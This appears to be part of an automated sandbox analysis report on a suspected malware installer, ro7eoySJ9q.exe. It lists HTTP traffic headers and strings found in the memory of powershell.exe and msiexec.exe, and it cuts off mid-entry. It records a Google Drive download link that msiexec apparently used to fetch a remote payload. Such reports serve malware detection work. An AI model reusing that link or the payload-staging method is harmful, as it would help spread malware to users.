UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXFlVnoPoSoaCZ-VhZH5PwAqIYy_lP7f_v20RhS_3274oaGNg7tTJuaKpjFFADm82ekGnkdB0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:21 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-yC7SrjGQMhvCaO-BuhRaeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSuLBWxBTWhtvbIxAWEz9k7FZbtEm5xpnIgr5OiEYXUMVuEjAd-ebiuK0ZRb_JFPSPTzq_U_WgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qzHDhLanIGWPx8bo5cmBTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSzbweVsItyvRnOlAa8CiI5FknY2DRoQPYXDcfvQBgv4IASAsU1vtihTmM7GOieeP8w5CKujvgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-aEkAcqGmBg0qrqQl2A18bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgThZMaEJ6nhJpFG9cMRNKZxGdB6FPITtZVXbpkkfHD4Qjqjy4_Rfg7gJTTDAJW9dZiVpWhrgMsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6KV-VokfnN3gCHt0jhNRrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSwCHat4uhEJ4UeKb7te0J71D_tJglQ3l5UHA3u8sHUWQkAMA6ZKrN7SkVrvj9pUPV-bKMn5uwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-BXAuri8N-g8MqamUDEvxiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQFFFDL6iJB0uVtmxZWg7YTE7svkqNKozszD9bYoTt0XDEejBki-lV6iUpzAzc4qpvZw7Y9NzIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0uNW_C1Nd0rfJ8rGXqQaOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgScSgnFCF1bib7ImfpRNgOwgBA_lupFaR_qSHRPyDpoh6PHtxIYb7GYuZCIsTYF1oMhS7iwhI0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-8VAymmCHxvr6rv_SM2eBQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microU
      Source: powershell.exe, 00000002.00000002.2822656298.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
      Source: powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft%
      Source: ro7eoySJ9q.exe, 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ro7eoySJ9q.exe, 00000000.00000000.2146201166.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=d
      Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/4v%
      Source: msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/WVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
      Source: msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/dv
      Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
      Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/user
      Source: msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/lifornia1
      Source: msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ny
      Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=do
      Source: msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/tv
      Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3435942709.0000000024C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B$q
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BRs
      Source: msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BX
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BZp
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_Blcck
      Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_Bpp
      Source: msiexec.exe, 00000008.00000003.3043390717.00000000099FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_Bst
      Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BygCjYRh_925Uq_B
      Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 